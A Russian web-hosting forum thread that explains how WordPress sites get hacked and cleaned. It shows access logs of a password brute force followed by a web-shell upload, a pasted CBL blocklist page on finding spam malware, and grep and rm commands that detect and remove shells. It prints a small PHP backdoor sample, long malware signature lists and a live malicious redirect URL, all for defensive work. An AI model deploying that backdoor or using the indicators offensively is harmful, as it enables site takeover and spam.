190.220.8.214 — - [25/Nov/2012:01:55:30 +0400] «POST /wp-login.php HTTP/1.0″ 200 3759 «-» «Mozilla/3.0 (compatible; Indy Library)»
 190.147.208.42 — - [25/Nov/2012:01:55:35 +0400] «POST /wp-login.php HTTP/1.0″ 200 3759 «-» «Mozilla/3.0 (compatible; Indy Library)»
 85.10.202.142 — - [25/Nov/2012:01:55:43 +0400] «POST /wp-login.php HTTP/1.0″ 200 3759 «-» «Mozilla/3.0 (compatible; Indy Library)»

С пятнадцатой попытки пароль подобрался, вероятно, пароль таки сложнее, чем admin, но проще, чем 1q2w3e4r:

60.214.67.86 — - [25/Nov/2012:01:59:01 +0400] «POST /wp-login.php HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»
 60.214.67.86 — - [25/Nov/2012:01:59:04 +0400] «POST /wp-admin/ HTTP/1.0″ 200 67017 «-» «Mozilla/3.0 (compatible; Indy Library)

Тут вступает в работу главный, залогинился и стал через редактор плагинов писать веб-шелл:

87.244.148.82 — - [25/Nov/2012:01:59:19 +0400] «POST /wp-login.php HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:20 +0400] «POST /wp-admin/ HTTP/1.0″ 200 67017 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:21 +0400] «GET /wp-admin/plugin-editor.php?file=akismet/legacy.php&plugin=akismet/akismet.php HTTP/1.0″ 200 45769 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:23 +0400] «POST /wp-admin/plugin-editor.php HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:24 +0400] «POST /wp-admin/plugin-editor.php?file=akismet/legacy.php&a=te&scrollto=0 HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:25 +0400] «POST /wp-admin/plugin-editor.php?file=akismet/legacy.php&a=te&scrollto=0 HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»

Веб-шелл записан и проверен:

87.244.148.82 — - [25/Nov/2012:01:59:31 +0400] «POST /wp-admin/plugin-editor.php?file=akismet/legacy.php&a=te&scrollto=0 HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:31 +0400] «GET /wp-content/plugins/akismet/legacy.php HTTP/1.0″ 200 120 «-» «Mozilla/3.0 (compatible; Indy Library)»

А через десять дней через веб-шелл записывают спамилку:

92.38.209.192 — - [05/Dec/2012:21:52:15 +0400] «POST /wp-content/plugins/akismet/legacy.php HTTP/1.0″ 200 15738 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″
 92.38.209.192 — - [05/Dec/2012:21:52:15 +0400] «POST /wp-content/plugins/akismet/legacy.php HTTP/1.0″ 200 16412 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″
 92.38.209.192 — - [05/Dec/2012:21:52:15 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″
 92.38.209.192 — - [05/Dec/2012:21:52:15 +0400] «POST /wp-content/plugins/akismet/legacy.php HTTP/1.0″ 200 17036 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″
 92.38.209.192 — - [05/Dec/2012:21:52:16 +0400] «GET /wp-content/plugins/akismet/xinfo.php?sf=0&showro=0 HTTP/1.0″ 200 3923 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″
 92.38.209.192 — - [05/Dec/2012:21:52:16 +0400] «GET /wp-content/plugins/akismet/xinfo.php?sf=0&showro=0 HTTP/1.0″ 200 3923 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″

А вот и спам начали рассылать:

92.202.91.45 — - [05/Dec/2012:21:54:12 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0″
 92.202.91.45 — - [05/Dec/2012:21:54:13 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0″
 188.76.208.38 — - [05/Dec/2012:21:55:47 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0″
 188.76.208.38 — - [05/Dec/2012:21:55:48 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0″
 188.76.208.38 — - [05/Dec/2012:21:55:49 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0″

А мог бы не спамить, а залить irc-бот для DDoS-атак. Или десяток-другой дорвеев на виагру для продвижения их с помощью спама. Или заразить сайт вирусами. Или еще что похуже, что вообще органы заинтересует. Если есть веб-шелл, то с сайтом можно сделать что угодно.

 

Как же сделать так, чтобы такое же не случилось с вами.  Защититься  довольно просто. WordPress — очень надёжная CMS. Неуязвимых CMS, конечно не бывает в природе, но WordPress взломать не так-то легко, если владелец сайта должным образом позаботится о безопасности.

Правило первое. Не ленитесь обновлять WordPress, плагины и темы до актуальной версии.  В отличие от некоторых других CMS, WordPress при обновлении не домается и плагины у него не отваливаются. Зато в случае обнаружения уязвимости в коде очередное обновление её быстро закрывает.

Правило второе. Устанавливайте сложный пароль.  Который невозможно подобрать с пятнадцатой попытки. И даже — с пятнадцатимиллионной попытки. Из-за того, что у WordPress с уязвимостями в коде всё в порядке, почти все случаи взлома связаны и подбором пароля администратора и последующим использованием редактора плагинов для размещения веб-шелла.  Устойчивый пароль должен состоять из 8-15 строчных и прописных латинских букв, цифр и знаков, не являющихся никаким осмысленным словом, в том числе и словом в другой раскладке клавиатуры или соседними клавишами. Кому сложно придумывать такой пароль — могу предложить генератор паролей http://password.vvsite.ru.

Правило третье. Для того, чтобы окончательно испортить хакеру настроение, установите плагин WP Sentinel, который будет автоматически банить ip-адреса, с которых идут попытки подбора паролей. И хотя в приводимом примере хакер использовал для пербора паролей разные ip,  но ни один хакер не обладает неограниченным количеством ip, и, если пароль не подберётся с 10-20 попыток, то с плагином WP Sentinel хакер никогда не сможет подобрать пароль.

Правило четвёртое. Запретите исполнение скриптов в директории wp-content. Скрипты плагинов и тем, расположенные в этой директории, никогда не вызываются напрямую, они включаются через директивы include и require. А загрузить чужой код средствами самого WordPress за пределы этой директории невозможно. Так что добавление в wp-content файла .htaccess со строками:

<files *php>
deny from all
</files>

не позволит злоумышленнику воспользоваться веб-шеллом, даже если он сумеет его разместить.

Некоторые немногочисленные плагины всё-таки обращаются напрямую к своим скриптам. В этом случае этим советом воспользоваться не получится.

Правило пятое. Последнее и самое важное. Не пренебрегайте безопасностью. Не надо думать, что взлом сайта может обойти вас стороной. Не обойдёт, если не защититесь.  Даже если ваш сайт — малопосещаемый, узкоспециальный и некоммерческий, его всё равно будут пытаться взломать, и совсем не для того, чтобы сделать гадость вам, в основном сайты взламывают исключительно для того, чтобы получить площадку для размещения нелегального контента и сокрытия нелегальных действий и злоумышленнику нет дела до содержания взломанного сайта.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Вт Ноя 24, 2015 4:13 pm    Заголовок сообщения: Ответить с цитатой

IMPORTANT

We know that this is long. But if solving these problems were so easy, this IP address wouldn't have been listed in the first place.

Seeing this web page means the problem as NOT been fixed yet. If the web page link shown below is not your page and you are NOT the hosting administrator, you cannot fix this problem, and you will need to contact the hosting administrator to fix it.

This IP address corresponds to a web site that is infected with a spam or malware forwarding/redirection link.

In other words the site has been hacked and is serving up redirection links to spam or malware. It is also almost certainly sending spam too.

We recommend that you review instructions below so as to prevent this happening in future.

The infected host name is "tata613.ru", and this link has an example of the malicious redirect: "http://tata613.ru/admin/controller/index.php?rbqu2hftjq4hgflv5hvatfuwbwese" Depending on the infection type, there may be dozens more malicious redirection pages under tata613.ru.

WARNING As the link is known to malicious, browsing that link is at your own risk.

If tata613.ru is not your host, there is nothing you can do to fix this problem: contact your hoster and have them fix it.

If you are the administrator, searching your web server logs for tata613.ru will likely reveal other copies of these malicious links as well as the command-and-control links (often .php).

One hosting company reported that the malicious script was called "mainik.php" and was dropped from Russian IP addresses.

If the problem is not resolved, this will undoubtably get listed again, and runs the risk of having the CBL disallow further removals. So, don't just delist the IP and expect it to stay delisted unless the root cause is solved.

In other words, Fix it! or run the risk of self-removals being refused in future listings.

Infected servers are usually shared web hosting environments running Cpanel, Plesk, Joomla or Wordpress CMS software that have become compromised either through a vulnerability (meaning the CMS software is out of date and needs patching), or users account information (userids/passwords) have been compromised, and malicious software/files are being uploaded by ftp or ssl. There are several different "families" of malware doing this, including darkmailer, directmailer, Stealrat and others. As a consequence of this, the instructions below focus on finding the problem no matter what it is.

Important: Simply removing the malicious link in general will not prevent future relistings. In fact, several of the botnets doing this have literally dozens of malicious redirects under the same hostname (webhosting account), other malicious links (eg: in Stealrat the command-and-control .php script), and there may be more than one infected webhosting account on the same machine. While manual-cleaning of one of these infections sometimes works, it's generally quite difficult to be sure you have it all. We recommend disabling the account, then reinstalling the account from backups.

We believe that these specific infections are frequently done by altering web server access control mechanisms (example, ".htaccess" files on Apache web servers), and causing the redirect to occur on all "404 url not found" errors. We would appreciate it if you can give us copies of the modifications that this infection has made to your system.

It probable that the change was made via SSL or ftp login using userid/password stolen from the "owner" of the hostname/domain. They should run anti-virus tools on their computers, and the password they use to access the web site should be changed immediately.

If you do not recognize the hostname tata613.ru as belonging to you, it means that some other account on this shared hosting site has been compromised, and there is NOTHING you (or we) can do to fix the infection. Only the administrator of this machine or the owner of tata613.ru can fix it.

Below we've included some information that should help you find and resolve the problem. But again, if it's not your hosting account that's infected, you're unlikely to be able to fix it.

Special note: this listing is based upon detecting a malicious redirector page. Much of the following talks about detecting outbound malicious email. While most redirecter-infected web hosts will also be sending email, not all will. By having the link above, you already know which hosting customer is infected, and the web server logs should tell you most of what you need to know.
CMS Infections in General

Many CMS infections are due to the StealRat botnet, it should be the first to check. This link is a Trend Micro PDF describing the infection in copious detail. While the PDF should be consulted for full information, checking for mysterious/unexplained PHP scripts in wp-content/plugins (if you're running Wordpress) directories should get you started. This link has instructions for a more directed search for it.

Finding Stealrat can be as simple as running the following command on UNIX-like systems - for "[dirs]", substitute in the web server document root, CGI and image directories:
find [dirs] -print | xargs -d'\n' grep 'die(PHP_OS.chr(49).chr(4Cool.chr(43).md5(0987654321'

If the above doesn't work, don't assume you are not infected. The Malware may have changed, or you didn't search the right directories. Keep searching.

Our findbot perl script has been enhanced to find Stealrat. However, we cannot guarantee that findbot.pl will find all copies of malware.

New: MELANI is a Swiss computer security/analysis center, and the link has general instructions on how to clean up CMS (Content Management Systems like Drupal or Wordpress) sites from infection.

In virtually all cases, these infections are injected onto the victim servers by means of vulnerabilities in the CMS software (eg: Drupal, Wordpress, etc). It is critically important that everyone using CMS keep them patched up to date:
Official Wordpress Downloads
Official Joomla Downloads
Official Drupal Downloads
Official Typo3 Downloads


If you are running Drupal, make sure that the patches referred to here are applied. If you're running Drupal you should upgrade to the latest versions.

Of late some of these infections are facilitiated by a SSH Rootkit called "ebury". See the link for more detail.

In most cases, this IP address would be that of a shared hosting environment. If you are a customer of this environment, you will almost certainly not be able to do anything about it, only the administrators of the hosting environment itself can. Please contact your administrators, and refer them to this page.

If the administrators are reluctant to do anything please try to convince them, because there is nothing you can do to fix this problem.
For the System Administrators

Your task is to find the current problem, fix it, and prevent it from happening again.
Finding the problem by network activity: Linux/FreeBSD etc

One way of finding the user that is infected and spewing spam is to use the "lsof" (list open files) utility. "lsof" is available for most versions of UNIX-like systems such as Linux as part of the official distribution, but may not be installed by default. So first, make sure you have it installed. On many systems such as Ubuntu, you can install it by:
sudo apt-get install lsof

Once lsof is installed, you can issue the following command
sudo lsof -i | grep smtp

You may see a number of lines, such as (example.com takes the place of your machine's name):
sendmail- 18520 root 3u IPv4 3016693 0t0 TCP *:smtp (LISTEN)
sendmail 4401 mail 13u IPv4 8742322 0t0 TCP example.com:42177->mail1.hotmail.com:smtp (ESTABLISHED)
exim 6348 mail 3u IPv4 210565067 0t0 TCP *:smtp (LISTEN)
find 4403 foo 13u IPv4 8742322 0t0 TCP example.com:42176->mtain-dk.r1000.mx.aol.com:smtp (ESTABLISHED)

The first line, for example, is your sendmail mail software "LISTEN"ing (as userid root) for inbound email connections - this is normal. The second line is sendmail "caught" at the moment of sending an email (as userid "mail") from your machine to a hotmail server - that is also perfectly normal. You may see similar lines with "exim" or "postfix" or "smtpd" or "qmail" instead of sendmail - all depending on what mail server you run - example - the third line is an Exim listener. The important thing that indicates that it's normal is that the userid is "mail" or "mailman" or something like that - NOT an ordinary user.

The fourth line is a program called "find", running under userid "foo" making a connection to an AOL server.

It's examples like the fourth line you're looking for - it tells you the userid of the infected user. In this case it also indicates that the infection is masquerading as the program "find". There will often be more than one of these.

Simply killing these processes is NOT enough, because they will often restart on their own. You will need to find whether these are started by a cron job owned by that user, or, spawned through your web server, or started from a ssh login. Find and delete the program - often a PHP or Perl script. In some cases, however, the program deletes itself as soon as it starts. The "find" example above is a Linux binary executable that contains an encrypted perl script. Since this was first written, it now sometimes masquerades as "mail" or "ntpd". Assume it could be anything. You will also need to find out how the script got installed on your machine - often through Joomla, Wordpress, Cpanel or Plesk security holes, or ftp upload and secure it.

WARNING Just because you didn't find a line like the "foo" line above doesn't mean the machine is not infected! It just means that the machine is not sending email at the instant lsof was run. If you don't see a line like the "foo" line, we suggest that you run the lsof command multiple times. Example:
while true
do
sudo lsof -i | grep smtp
sleep 10
done
Finding the problem by finding the script: Linux/FreeBSD

NEW! There's a new version of findbot that should find CryptoPHP faster and simpler - try the -c option.

There are a number of scanners that can be used on web servers to try to find malicious PHP and Perl scripts, such as rkhunter etc.

With the assistance of others, we've written a simple perl script called findbot.pl that searches for such things as r57shell, cryptphp etc. It will search your system can find potentially dangerous scripts.

As it's very simple-minded you will have to carefully inspect the files it finds to verify whether what it finds is malicious or not. Be aware of the file types - finding executable code fragments within ".png" or ".jpg" files is clearly demonstrates that the file is malicious.

In order to use findbot.pl, you will need Perl installed.
Install perl if necessary
Download findbot.pl
Follow the instructions at the beginning of the findbot.pl file
Armoring PHP against infections

Suhosin may be a useful tool to protect your PHP environment from various malware.

Many of these infections start themselves running, and then delete themselves from disk. Which means you won't be able to find it. Check your ftp and SSH logs for suspicious files and logins. This is why it's so important to prevent it happening again.

One additional way of finding this infection that works for some variants is to run the "file" command (you may have to install it - eg: "sudo apt-get install file") on the suspicious program.

"ELF 32-bit and "corrupted section header size" from the example below means that you've probably found the right file:
$ file sshd
sshd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically
linked, corrupted section header size


The above test can be used in bulk, using either of the following two commands:
file /path/to/directory/* | grep 'corrupted section'
find /path1 /path2 -print | xargs -d'\n' file | grep 'corrupted section'
If you find such a file, please send us copies.
Finding the problem by network activity: Windows

The Windows environment is rather less developed for finding these things than UNIX-like systems. However, we can recommend the tcpview tool, so please see tcpview/tcpconn in our advanced section.
Finding the problem by logs: (Mostly) Linux/FreeBSD

Most of these scripts are quite good at hiding their presence. Some of them start up, and them remove the on-disk copy, so there's nothing to see. None of them volunteer where they are, so samples don't help. Most of these scripts bypass your mail server software, so there is nothing to see in the mail logs or queues.

However, they all do need to get on your system somehow, and that often leaves logs. If you can find those log records, often that will help you identify the infected user and find the malicious files (if they are still there).

Generally speaking, these are the ways malicious scripts get onto a system:
Web sites often make FTP or SSL available so their customers can upload content or log in to manage their web pages. If the customer's computer is compromised with a keylogger, it means that the criminal can upload anything they want. You can usually see this activity in your FTP or SSL logs - look for uploads of .php or .pl files, lots of oddly named files, access from a large variety of IP addresses, etc. If you do find something like this, it's important to get the user to change their password, and do virus scans of their computers.
Check your web server for large quantities of requests to the same PHP or CGI or Perl file, or POST commands, etc... This can reveal where the infection is, and often how it got there.
Most CMSes, in particular, Plesk, CPanel, Wordpress and Joomla quite simply have severe security holes being found in them, seemingly daily, and hosted environments are often reluctant to keep up to date with their patching. You may never find a reasonable explanation of how the malicious software got there
Preventing it Happening Again
Delisting inhibited Follow the above instructions to get it delisted.



<< Back to CBL homepage
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Чт Фев 25, 2016 3:36 pm    Заголовок сообщения: Ответить с цитатой

поиск последних изменявшихся файлов
find /var/www/ -type f -name '*.ph*' -ctime -7
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Ср Июн 22, 2016 10:14 am    Заголовок сообщения: Ответить с цитатой

http://firstwiki.ru/index.php/Поиск_и_профилактика_защиты_от_вредоносного_ПО

Поиск скриптов, рассылающих спам и файлов ботнета Zeus, Exploit Kit Redirect

Команда, которая не удалит ничего лишнего:

#
Код:
grep -Rils --include=\*.php -e ' n7b0ecdff' -e 'CmlmKGlzc2V0KCRfUE9TVFsiY29k' ./* | xargs rm


Эта команда найдет возможные спам-скрипты и сохранит их список в файл spam_scripts в директории, где вы сейчас находитесь:


#
Код:
grep -Rils --include=\*.php -e '\@\$emaillist\=\$_POST' -e '\$emaillist=' -e '\$smtp_username=' -e '\$smtp_password=' -e 'Sender Anonym Email' ./* > spam_scripts


Эта команда найдет различные ботнетовские редиректы, и сохранит их список в файл redirects в директории, где вы сейчас находитесь:

#
Код:
grep -Rils --include=\*.{php,htm,html} -e 'if(md5(md5(\$' -e 'h1\>Loading...' -e 'b\>Please wait a moment ...\ You will be forwarded. \<' -e '... Please wait...\<\/h3' -e 'You are here because one of your friends has invited you...\
Redirecting...' -e 'bankofamerica' -e 'http:\/\/hellosomeguys' -e 'rldailynews.com' -e 'http\:\/\/.*doctor.*\.com' -e '\-\-81a338\-\-' -e '\; it.src = ' ./* > redirects


В результате выполнения этих команд, вы получите два списка файлов, которые необходимо вручную проверить: если среди них нет нужных файлов, то вы можете удалить все файлы из списка.
Поиск различных malware скриптов

Эта команда найдет Shell'ы на сайтах, и сохранит их список в файл [b]malware1 в директории, где вы сейчас находитесь. Так как такая команда может занять довольно продолжительное время, поэтому в ее конце стоит знак &, это позволит продолжить работу с консолью.[/b]

#
Код:
grep -Rils --include=\*.{php,htm,html} -e 'FilesMan' -e 'b=4594' -e 'e2aa4e' -e 'v58f57b98 = 0' -e 'forexam\@pandion.im' -e 'pathToDomains' -e 'if(navigator.userAgent.match(' -e 'var vst = String.fromCharCode' -e 'Menu\_files\/jquery.js' -e 'i5463 == null' -e 'r57.gen.tr' -e '\/rsize.js' -e 'feelthesame.changeip.name' -e '40,101,115,110,98,114,105,110' -e 'c99sh' -e 'Shell by' -e ' sh_ver' -e '\.tcpflood' -e 'c999sh' -e 'Array(base64_decode' -e 'Attacker Perl File' -e 'bogel = ' -e '(\!function_exists(\"getmicrotime\"))' -e'\$d=substr' -e 'WSO ' -e 'r57shell' -e 'msg=@gzinflate(@base64_decode(@str_replace' -e '6POkiojiO7iY3ns1rn8' -e ' mysql_safe' -e 'sql2_safe' -e 'aHR0cDovLzE3OC4yMTEu' -e 'php function _' -e 'encodeURIComponent(document.URL)' -e '\; if(isset(\$_REQUEST' -e 'UdpFlood' -e 'udp\:\/\/1.1.1.1' -e '\ (md5(\$_POST\[' -e 'header(\"Location\: http' -e 'fx29sh_' -e 'c999sh_surl' -e 'c99sh' -e '\/request12.php' -e 'NlOThmMjgyODM0NjkyODdiYT' ./* > malware1 &


Эта команда найдет различные malware в php скриптах на сайтах, и сохранит их список в файл malware2 в директории, где вы сейчас находитесь. Выполнение этой команды, так же как и предыдущей, может занять продолжительное время, поэтому в ее конце стоит &:


Код:
# grep -Rils --include=\*.php -e 'JGNvZGUgPSBiYXNlN' -e 'DQplcnJ' -e 'eval(gzinflate(base64_decode' -e 'eval(gzinflate(str_rot13(base64_decode(' -e 'eval(gzuncompress(base64_decode(' -e 'eNrtfWt72zbS6Of6VyBcZSk1uviSS2vFTl1Haf' -e 'JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5' -e 'JHNoX2lkID0gIld5QW1aR0ZuWjJWeU95Q' -e 'sDdphXZgsTKddSYnsFVT9EUfRCI' -e 'QBDB51E25BF9A7F3D2475072803D1C36D' -e 'Yzk5c2hlbGwucGhw' -e 'aHR0cDovL3d3dy5zb21lLWNvZGUvZXhwbG9pdHMuYw' -e 'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kL' -e 'QfgsDdphXZgsTKog2c1x' -e 'QGVycm9yX3JlcG9ydGluZygwKTsg' -e 'JHNoX2lkID0gIlQzZHVaV1' -e 'rUl6QttVEP58lfoflr' -e 'jVNtT9tADP4' -e 'c2V0X3RpbWVf' -e 'UFycmF5KGJhc2U2NF9kZWNvZGUo' -e 'pZLfasMgFMbvB3sHK4UolLKNXa3r' -e 'nVNdi9swEHw' -e 'JHl5eU5CTnJLZk5TeUdyaX' -e 'JZvHbsRIlkX39SNdBS5okwbd0wV6n' -e '8\<\[\@7MGLKMs' -e 'DVU1EuQGEHyO70qBWKst' -e '\@432LKMs' -e 'QfgsDdphXZgsTKog' -e 'ZGVmaW5lKCdBS0lTTUVUX1' ./* > malware2 &


Эта команда найдет различные malware в java скриптах на сайтах. Список выведет сразу:
#
Код:
grep -Rils --include=\*.js -e '\%3C\%73\%63\%72\%69\%70\%74\%20\%74\%79\%70' -e 'kSKlBXYjNXZfhSZwF2YzVmb1h' ./*



Проверка и чистка/удаление найденных скриптов

После получения списка зараженных файлов настало время их почистить.

malware1:
Код:
cat malware1 | grep -v 'public_html' | grep -v 'webstat' | xargs grep -Rils 'FilesMan' | \
xargs grep -Rils "sDdphXZgsTKddSYnsF" | xargs sed -i "" -e "/auth_pass\ =/d" &

Код:
cat malware1 | grep -v 'public_html' | grep -v 'webstat' | xargs grep -Rils 'FilesMan' | \
xargs grep -Rils "sDdphXZgsTKddSYnsF" | xargs sed -i "" -e "/sDdphXZgsTKddSYnsF/d" &

Код:
cat malware1 | grep -v 'public_html' | grep -v 'webstat' | xargs grep -Rils 'FilesMan' | xargs rm &


Следующая команда удаляет скрипты с подобным кодом:
Код:
<?php $awff = "a9b193d36245fc6a750a75eb594a3c70"; if(isset($_REQUEST['vpyu'])) { $wwyioqi = $_REQUEST['vpyu'];
eval($wwyioqi); exit(); } if(isset($_REQUEST['yccqdyb'])) { $mhvwg = $_REQUEST['qipseeqy'];
$mvwvjnec = $_REQUEST['yccqdyb']; $gfcked = fopen($mvwvjnec, 'w'); $qllnske = fwrite($gfcked, $mhvwg);
fclose($gfcked); echo $qllnske; exit(); }?>
cat malware1 | xargs grep -Rils ' = fopen(\$' | xargs grep -Rils ' = fwrite(\$' | xargs rm &


Команда, которая удалит веб-шеллы FilesMan:
Код:
cat malware1 | xargs grep -Rils 'FilesMan' | xargs grep -Rils 'auth_pass' | xargs rm &


Смотрим для каждого паттерна и по ходу либо чистим файлы, либо удаляем.
Код:
cat malware1 | xargs grep -Rils 'b=4594'


malware2:

Чистка кода от возможных вставок:

Код:
cat malware2 | xargs grep -Rils 'DQplcnJ' | xargs perl -pi -e 's/eval\(base64_decode\(\"DQplcn.*fQ0KfQ\=\="\)\)\;//g' &
cat malware2 | xargs grep -Rils 'DQplcnJ' | xargs perl -pi -e 's/eval\(base64_decode\(\"DQplcn.*Cn0NCn0\=\"\)\)\;//g' &
cat malware2 | xargs grep -Rils 'DQplcnJ' | xargs perl -pi -e 's/eval\(base64_decode\(\"DQplcn.*DQp9DQp9\"\)\)\;//g' &


Смотрим каждый паттерн отдельно и также либо чистим, либо удаляем файл:
Код:
cat malware1 | xargs grep -Rils 'паттерн_из_второй_длинной_команды_из_пункта_3'




Профилактика защиты от вирусов

Не секрет, что чем дальше, тем больше становится вредоносного кода, способного поразить файлы Вашего сайта и все больше способов злоумышленники находят, чтобы получить доступ к файлам сайта. Не существует панацеи, чтобы "легким движением руки" раз и навсегда избавить свои файлы от печальной участи. Прежде всего, безопасность Ваших ресурсов зависит именно от Ваших же действий. Вам необходимо снизить шанс заражения сайта вредоносным кодом. Более подробно рассмотрим некоторые возможности для осуществления этого.
Как предостеречь свои проекты от вредоносного кода, а также себя от нервных срывов
Прежде, чем размещать сайт на сервере, проверьте антивирусом все компьютеры, на которых могли находиться файлы сайта и с которых Вы производите администрирование. Делайте проверку регулярно;
Используйте новые версии CMS и всех шаблонов/плагинов/скриптов для сайта, регулярно делайте обновления. Обратите также внимание, что nulled-версии (не лицензионные) CMS могут иметь ряд уязвимостей;
Используемые пароли - немаловажный пункт. Меняйте пароли периодически и не пренебрегайте правилам безопасности паролей;
Старайтесь не размещать несколько сайтов в директории одного пользователя, а по возможности создавайте отдельного пользователя для каждого - так Вы изолируете сайты друг от друга на случай заражения;
Возьмите за правило делать резервные копии (бэкапы) сайтов. Как только закончили размещать сайт на сервере и наполнять его контентом, сделайте его бэкап, чтобы Вы всегда смогли восстановить файлы сайта. Обязательно настройте график резервного копирования в панели управления сервером ISPmanager (если Вы используете ее). Инструкция здесь;
Слабое место сайта - это директории с правами доступа 777 (например, uploads), куда злоумышленники могут поместить вредоносные скрипты. Запретите исполнение кода с помощью .htaccess в таких директориях. Для этого создайте файл с именем .htaccess в необходимой директории с следующим содержимым:
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
В файле конфигурации PHP (php.ini) отключите неиспользуемые функции из списка в опции disable_functions (используемые уберите):
disable_functions = exec, mail, passthru, shell_exec, system, proc_open, popen, curl_exec, curl_multi_exec, parse_ini_file, show_source
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
Показать сообщения:   
Начать новую тему   Ответить на тему    Список форумов newssoft.ru -> Серверные команды Часовой пояс: GMT + 3
Страница 1 из 1

 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах


Powered by phpBB © 2001, 2005 phpBB Group
AllSat 22  - photographe de mariage - 2006